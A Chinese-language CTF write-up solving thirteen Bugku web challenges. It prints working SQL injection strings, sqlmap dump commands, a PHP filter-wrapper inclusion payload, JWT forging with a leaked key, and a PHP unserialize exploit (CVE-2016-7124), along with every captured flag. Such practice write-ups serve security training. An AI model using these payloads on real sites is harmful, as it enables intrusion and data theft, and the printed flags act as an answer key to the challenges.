CTF論劍場 Web1-13 WriteUp

2019 年 10 月 8 日
筆記

平台地址：https://new.bugku.com/

web1 simple bypass

extract — 從數組中將變數導入到當前的符號表，trim — 去除字元串首尾處的空白字元（或者其他字元）。

Payload: a=&b=即可成功繞過，回顯 flag{c3fd1661da5efb989c72b91f3c378759}。

web2 Quick calc

<html>  <head>  <title></title>  </head>  <body>  <p>  請在三秒之內計算出以下式子，計算正確就的到flag哦！<br/>  418*693117+32*(9976+2487)</p>  <form action="" method="post">  計算結果:<input type="text" name="result"/>  <input type="submit" value="提交"/>  </form>  </body>  </html>

Payload:

import re  import requests    url = 'http://123.206.31.85:10002/'  r = requests.session()  text = r.get(url).text  calc = str(re.findall("(.*?)</p>", text))[2:-2]  ans = eval(calc)  data = {'result':ans}  res = r.post(url, data)  print(res.text)

即可獲得 flag{b37d6bdd7bb132c7c7f6072cd318697c}。

web3 php偽協議

嘗試上傳 php文件時回顯 Sorry,only PNG files are allowed.。

判斷為服務端白名單驗證，這裡參考 upload-labs題解思路進行測試。

測試無果,發現 url的 op參數首頁為 op=home上傳頁面為 op=upload，猜測存在文件包含漏洞~

op=1回顯： Errornosuch page。

參考: php 偽協議

使用php偽協議嘗試傳參： ?op=php://filter/read=convert.base64-encode/resource=flag，回顯 PD9waHAgCiRmbGFnPSJmbGFne2UwMGY4OTMxMDM3Y2JkYjI1ZjZiMWQ4MmRmZTU1NTJmfSI7IAo/Pgo=。

Base64 decode：

<?php  $flag="flag{e00f8931037cbdb25f6b1d82dfe5552f}";  ?>

web4 萬能密碼

Payload: 萬能密碼, 注入點在password， password=' or '1'='1成功登陸。

flag{7ae7de60f14eb3cbd9403a0c4328598d}

web5 injection

hint: injection

> sqlmap -u "http://47.95.208.167:10005/?mod=read&id=1" -p "id" -v 3    Parameter: id (GET)      Type: boolean-based blind      Title: AND boolean-based blind - WHERE or HAVING clause      Payload: mod=read&id=2 AND 6548=6548      Vector: AND [INFERENCE]        Type: AND/OR time-based blind      Title: MySQL >= 5.0.12 RLIKE time-based blind      Payload: mod=read&id=2 RLIKE SLEEP(5)      Vector: RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))          Type: UNION query      Title: Generic UNION query (NULL) - 4 columns      Payload: mod=read&id=-1362 UNION ALL SELECT NULL,CONCAT(0x716b706b71,0x6b705a4550514d7864627845624c7252716d53456758474165446c66654e4a6b43714d776b767255,0x716b6a6b71),NULL,NULL-- vymr      Vector:  UNION ALL SELECT NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]  ---  [21:03:29] [INFO] the back-end DBMS is MySQL  web application technology: Nginx  back-end DBMS: MySQL >= 5.0.12    ...    > sqlmap -u "http://47.95.208.167:10005/?mod=read&id=1" -p "id" -v 3 -D "web5" -T "flag" -C "flag" --dump    Database: web5  Table: flag  [1 entry]  +----------------------------------------+  | flag                                   |  +----------------------------------------+  | flag{320dbb1c03cdaaf29d16f9d653c88bcb} |  +----------------------------------------+

web6 XFF、F12

提交 user=admin' or '1'='1、 pass=' or '1'='1後回顯：IP禁止訪問，請聯繫本地管理員登陸，IP已被記錄.

猜想 X-Forward-For:127.0.0.1，這裡通過Firefox插件X-Forwarded-For Header直接修改。

提交 user=admin&pass=admin/ user=amdin&pass=1後回顯：Invalid credentials! Please try again!

F12查看源程式碼在5023行： 。

base64.decode後得到密碼 test123。

登陸後回顯： Theflagis:85ff2ee4171396724bae20c0bd851f6b.

web7 吃個小餅乾嗎？

吃個小餅乾嗎？

註冊測試用戶後登陸， home.php頁面如下：

任意內容提交回顯相同頁面。

想起小餅乾的翻譯是cookie，在報文中發現如下cookie欄位:

Set-Cookie: u=351e76680321232f297a57a5a743894a0e4a801fc3  Set-Cookie: r=351e766803d63c7ede8cb1e1c8db5e51c63fd47cff  # 規律如下  Set-Cookie: u=351e766803 21232f297a57a5a743894a0e4a801fc3  Set-Cookie: r=351e766803 d63c7ede8cb1e1c8db5e51c63fd47cff  # md5(admin, 32) = 21232f297a57a5a743894a0e4a801fc3  # d63c7ede8cb1e1c8db5e51c63fd47cff 解密明文為 limited

嘗試cookie欺騙~

web8 SimpleSQLI

註冊測試賬戶後，個人資訊更新頁面如下：

dirsearch下發現有 /.idea/workspace.xml泄露以及 www.tar.gz源碼文件。

update.php中age處存在數字型注入點,payload如下：

# 直接回顯  (select group_concat(description) from (select description from users where username=0x61646d696e)x)  # 逐位爆破(注意csrf-token的處理)  0|conv(hex(substr((select description from (select * from users where username like 0x61646d696e)a),1,1)), 16, 10)  conv(hex(substr((select description from (select * from users where username regexp 0x61646d696e limit 0,1)a),1,1)), 16, 10)

web9 PUT me message!

put me a message bugku then you can get the flag

Base64.decode->flag{T7l8xs9fc1nct8NviPTbn3fG0dzX9V}.

web10 在線日記本

hint:JWT你需要了解一哈.

base32.decode("NNVTU23LGEZDG===")=kk:kk123,username=kk&password=kk123提交登錄。

下載 L3yx.php.swp文件，通過 vi-r L3yx.php:wq還原文件。

<html>  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>  <title>在線日記本</title>  <form action="" method="POST">    <p>username: <input type="text" name="username" /></p>    <p>password: <input type="password" name="password" /></p>    <input type="submit" value="login" />  </form>  <!--hint:NNVTU23LGEZDG===-->  </html>    <?php      error_reporting(0);      require_once 'src/JWT.php';        const KEY = 'L3yx----++++----';        function loginkk()      {          $time = time();          $token = [            'iss'=>'L3yx',            'iat'=>$time,            'exp'=>$time+5,            'account'=>'kk'          ];          $jwt = FirebaseJWTJWT::encode($token,KEY);          setcookie("token",$jwt);          header("location:user.php");      }        if(isset($_POST['username']) && isset($_POST['password']) && $_POST['username']!='' && $_POST['password']!='')      {          if($_POST['username']=='kk' && $_POST['password']=='kk123')          {              loginkk();          }          else          {              echo "帳號或密碼錯誤";          }      }  ?>

JWT學習參考：JSON Web Token 入門教程 – 阮一峰

獲取 Key='L3yx----++++----'，使用 kk賬戶登錄得到：

# Header.Payload.Signature  token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTUxOTY1ODIxLCJleHAiOjE1NTE5NjU4MjYsImFjY291bnQiOiJrayJ9.ImnDWj4kYTxYyGfrOt-M0LCSwYSC8VtjdTfP03MLOyg  # Header  eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.  # Payload  eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTUxOTY1ODIxLCJleHAiOjE1NTE5NjU4MjYsImFjY291bnQiOiJrayJ9.  # Signature  ImnDWj4kYTxYyGfrOt-M0LCSwYSC8VtjdTfP03MLOyg

更改account為L3yx,提前計算好iat和exp構造Token發包到user.php~

JSON Web Tokens – jwt.io

web11 MD5截斷比較

<html>  <title>robots</title>  <body>  We han't anything!  </body>  </html>

訪問 .robots發現：Disallow: /shell.php，打開/shell.php.

可知為md5截斷比較~ 每次刷新頁面匹配值會改變，這裡採用短時間生成大量MD5，犧牲空間來換取時間~

# -*- coding: utf-8 -*-  import hashlib  sum = []  j = 0  f = open("gen_md5.txt", "a")  for i in xrange(1000000000):      tmp = (hashlib.md5(str(i)).hexdigest(),i)      sum.append(tmp)      j = j+1      if(j==10000000):          for i in sum:              f.write("{0} {1}".format(i,"n"))          j=0          sum = []  f.close()

執行命令正則匹配： cat gen_md5.txt|grep ('str檢索符合的MD5~

得到:flag{e2f86fb5f75da4999e6f4957d89aaca0}.

web12 unserialize

hint:時間好長啊

F12檢查源程式碼發現注釋掉的PHP程式碼：

class Time{      public $flag = ******************;      public $truepassword = ******************;      public $time;      public $password ;      public function __construct($tt, $pp) {              $this->time = $tt;              $this->password = $pp;          }      function __destruct(){          if(!empty($this->password))          {              if(strcmp($this->password,$this->truepassword)==0){                  echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";                  if(!empty($this->time)){                      if(!is_numeric($this->time)){                          echo 'Sorry.<br>';                          show_source(__FILE__);                      }                      else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){                          echo 'you need a bigger time.<br>';                      }                      else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){                          echo 'you need a smaller time.<br>';                      }                      else{                          sleep((int)$this->time);                          var_dump($this->flag);                      }                      echo '<hr>';                  }                  else{                      echo '<h1>you have no time!!!!!</h1><br>';                  }              }              else{                  echo '<h1>Password is wrong............</h1><br>';              }          }          else{              echo "<h1>Please input password..........</h1><br>";          }      }      function __wakeup(){          $this->password = 1; echo 'hello hacker,I have changed your password and time, rua!';      }  }  if(isset($_GET['rua'])){      $rua = $_GET['rua'];      @unserialize($rua);  }  else{      echo "<h1>Please don't stop rua 233333</h1><br>";  }

典型的 PHP反序列化題目，可以參考：PHP反序列化由淺入深學習了解~

簡單審計思路：通過GET傳值 rua後進行反序列化, unserialize() 會檢查是否存在一個 wakeup() 方法。如果存在，則會先調用 __wakeup 方法，預先準備對象需要的資源。destruct()會在對象的所有引用都被刪除或者當對象被顯式銷毀時執行，想要獲取 flag，我們需要 rua滿足一下條件：

strcmp($this->password,$this->truepassword)==0
$this->time < 11 * 22 * 33 * 44 * 55 * 66 & $this->time > 66 * 55 * 44 * 33 * 23 * 11
sleep((int)$this->time)

繞過方法:

繞過wakeup的執行(CVE-2016-7124):*當序列化字元串中表示對象屬性個數的值大於真實的屬性個數時會跳過wakeup的執行*，修改對象屬性個數。
繞過strcmp: Php5.3之後版本使用strcmp比較一個字元串和數組的話,將不再返回-1而是返回0，構造password數組。
繞過sleep(): (1)使用16進位表示 0x開頭，強制類型轉化時會轉化為 0；(2)使用科學計數法繞過， 1.3E9。

構造腳本：

<?php  class Time{      public $time;      public $password;      public function __construct($tt, $pp) {              $this->time = $tt;              $this->password = $pp;      }  }  $array = array(      0 => "bar",      1 => "foo",  );  $time = '0x4d7c6d00';  $rua = new Time($time, $array);  echo serialize($rua);  //O:4:"Time":2:{s:4:"time";s:10:"0x4d7c6d00";s:8:"password";a:2:{i:0;s:3:"bar";i:1;s:3:"foo";}}  ?>

Payload: rua=O:4:"Time":3:{s:4:"time";s:10:"0x4d7c6d00";s:8:"password";a:2:{i:0;s:3:"bar";i:1;s:3:"foo";}}.

web13 to be faster

用BurpSuite抓包分析如下:

在response Header頭裡發現了 Password和 Hint欄位，base64解密 Password後得到flag{f4970aacbacfba9e57ddbf998fa2e29d}，提交錯誤~

Hint: Seeing is not believing, maybe you need to be faster!

嘗試將Password解密後flag{}裡面包含的欄位提交回顯如下:

推測需要先發送一個請求截取Password欄位，然後base解密取flag{}內包含的值作為password的值發包，速度要快。

Payload:

import requests  import base64  url = 'http://123.xxx.xxx.85:10013/index.php'  r = requests.session()  r1 = r.post(url, data = {'password':'flag'})  Password = r1.headers['Password']  password = str(base64.b64decode(Password), 'utf-8')[5:-1]  r2 = r.post(url, data = {'password':password})  print(r2.text)